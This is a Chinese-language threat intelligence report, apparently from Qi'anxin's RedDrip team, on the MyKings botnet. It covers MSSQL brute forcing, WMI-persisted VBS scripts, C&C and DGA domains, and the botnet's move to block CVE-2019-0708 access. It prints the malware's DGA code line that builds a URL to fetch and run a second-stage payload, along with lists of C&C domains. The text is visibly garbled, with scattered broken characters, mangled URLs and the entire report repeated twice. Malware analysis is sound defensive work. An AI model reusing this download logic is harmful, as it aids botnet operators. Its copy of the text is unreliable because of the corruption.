脅概述
MyKings�����,國內大型黑產團伙���,于2017年2月左右開始出現,掌握多個子僵尸網絡構成的多重僵尸網絡��,控制肉雞達百萬級���,主要通過DDoS攻擊和挖礦盈利���,通過常規手段入侵后常用Powershell進行駐留���,并利用“永恒之藍”和Mimikatz進行橫向擴散�����,從而構建更大規模的僵尸網絡��。
近日����,奇安信威脅情報中心紅雨滴團隊監測到MyKings團伙新動態�����,通過MSSQL爆破入侵服務器后���,除了采用DGA域名連接CC服務器下載執行遠程命令的機制外���,值得注意的是惡意代碼會檢測機器是否安裝微軟5月補丁��,如果未安裝則會修改設置禁止其他機器通過遠程桌面訪問。我們根據此舉推測�����,MyKings團伙在獲取機器的控制權以后���,會試圖“加固”系統以阻止其他攻擊者通過利用CVE-2019-0708漏洞進入機器�,保證自己的對機器的唯一控制權�����。
值得一提的是���,微軟遠程桌面服務遠程代碼執行漏洞CVE-2019-0708�����,近期已陸陸續續傳出在受漏洞影響的系統中穩定利用的視頻和截圖,并且自從能導致系統藍屏的POC出現以來,外網已陸陸續續出現修訂版本��??梢悦鞔_,雖目前還沒有公開的RCE Exploit,但從該趨勢表明其必將隨時出現����。
而在漏洞利用出現之日��,黑產團伙將會使用早已收集齊全的受漏洞影響的設備清單,批量進行攻擊�,抓取肉雞�����,就像MyKings曾經使用“永恒之藍”系列漏洞抓取肉雞的操作一樣,那時,將會是一場網絡空間災難�����。因此��,請務必對主機進行補丁更新,防止造成不必要的損失����。
詳情請看
更新|微軟遠程桌面服務遠程代碼執行漏洞(CVE-2019-0708)預警通告
https://mp.weixin.qq.com/s/QE9lSKF6xVj69zI8jqbX3g
惡意代碼的分析
惡意代碼通過MSSQL爆破進入目標機器��,執行regsvr32.exe加載遠程腳本:
遠程腳本的功能為:利用WMI使一段VBS腳本在機器中持續駐留。
此VBS腳本運行nslookup命令查詢C&C域名http://news.g23thr.com的DNS記錄��,如果http://news.g23thr.com解析的IP地址為xxx.xxx.xxx.120��,則訪問URL “http://”+chr(xxx)+chr(xxx)+chr(xxx)+”http://xfghh.com/mgxbox.txt”下載第二階段的Payload運行���,URL由IP地址轉化為ASCII后拼接得成����。目前域名http://news.g23thr.com解析IP為8.8.8.8��,此時惡意代碼進入另一流程�����,嘗試通過DGA域名訪問�����。
DGA域名通過當前時間的年、月、日、分鐘���、秒數值計算得到,算法如下:
u=(hex((year(now())-2000)&Month(now())&(day(now()))&(year(now())-2000)))&"http://fdae.tk"
url="http://"&minute(now())&second(now())&"."&u&"/mgxbox.txt"
通過該算法我們得到2019年6月、7月���、8月的二級域名如下:
2019年6月
2019年7月
2019年8月
http://2fdb3fdae.tk
http://3019bfdae.tk
http://30583fdae.tk
http://2fe17fdae.tk
http://301fffdae.tk
http://305e7fdae.tk
http://2fe7bfdae.tk
http://30263fdae.tk
http://3064bfdae.tk
http://2fedffdae.tk
http://302c7fdae.tk
http://30713fdae.tk
威脅概述
MyKings,國內大型黑產團伙,于2017年2月左右開始出現,掌握多個子僵尸網絡構成的多重僵尸網絡�,控制肉雞達百萬級��,主要通過DDoS攻擊和挖礦盈利�����,通過常規手段入侵后常用Powershell進行駐留����,并利用“永恒之藍”和Mimikatz進行橫向擴散����,從而構建更大規模的僵尸網絡。
近日�����,奇安信威脅情報中心紅雨滴團隊監測到MyKings團伙新動態��,通過MSSQL爆破入侵服務器后��,除了采用DGA域名連接CC服務器下載執行遠程命令的機制外,值得注意的是惡意代碼會檢測機器是否安裝微軟5月補丁�,如果未安裝則會修改設置禁止其他機器通過遠程桌面訪問���。我們根據此舉推測��,MyKings團伙在獲取機器的控制權以后,會試圖“加固”系統以阻止其他攻擊者通過利用CVE-2019-0708漏洞進入機器��,保證自己的對機器的唯一控制權����。
值得一提的是,微軟遠程桌面服務遠程代碼執行漏洞CVE-2019-0708�����,近期已陸陸續續傳出在受漏洞影響的系統中穩定利用的視頻和截圖�����,并且自從能導致系統藍屏的POC出現以來,外網已陸陸續續出現修訂版本?�?梢悦鞔_��,雖目前還沒有公開的RCE Exploit����,但從該趨勢表明其必將隨時出現����。
而在漏洞利用出現之日,黑產團伙將會使用早已收集齊全的受漏洞影響的設備清單����,批量進行攻擊����,抓取肉雞�,就像MyKings曾經使用“永恒之藍”系列漏洞抓取肉雞的操作一樣,那時���,將會是一場網絡空間災難�����。因此,請務必對主機進行補丁更新����,防止造成不必要的損失。
詳情請看
更新|微軟遠程桌面服務遠程代碼執行漏洞(CVE-2019-0708)預警通告
https://mp.weixin.qq.com/s/QE9lSKF6xVj69zI8jqbX3g
惡意代碼的分析
惡意代碼通過MSSQL爆破進入目標機器,執行regsvr32.exe加載遠程腳本:
遠程腳本的功能為:利用WMI使一段VBS腳本在機器中持續駐留�。
此VBS腳本運行nslookup命令查詢C&C域名http://news.g23thr.com的DNS記錄��,如果http://news.g23thr.com解析的IP地址為xxx.xxx.xxx.120,則訪問URL “http://”+chr(xxx)+chr(xxx)+chr(xxx)+”http://xfghh.com/mgxbox.txt”下載第二階段的Payload運行,URL由IP地址轉化為ASCII后拼接得成。目前域名http://news.g23thr.com解析IP為8.8.8.8,此時惡意代碼進入另一流程���,嘗試通過DGA域名訪問。
DGA域名通過當前時間的年、月�、日����、分鐘��、秒數值計算得到����,算法如下:
u=(hex((year(now())-2000)&Month(now())&(day(now()))&(year(now())-2000)))&"http://fdae.tk"
url="http://"&minute(now())&second(now())&"."&u&"/mgxbox.txt"
通過該算法我們得到2019年6月����、7月、8月的二級域名如下:
2019年6月
2019年7月
2019年8月
http://2fdb3fdae.tk
http://3019bfdae.tk
http://30583fdae.tk
http://2fe17fdae.tk
http://301fffdae.tk
http://305e7fdae.tk
http://2fe7bfdae.tk
http://30263fdae.tk
http://3064bfdae.tk
http://2fedffdae.tk
http://302c7fdae.tk
http://30713fdae.tk
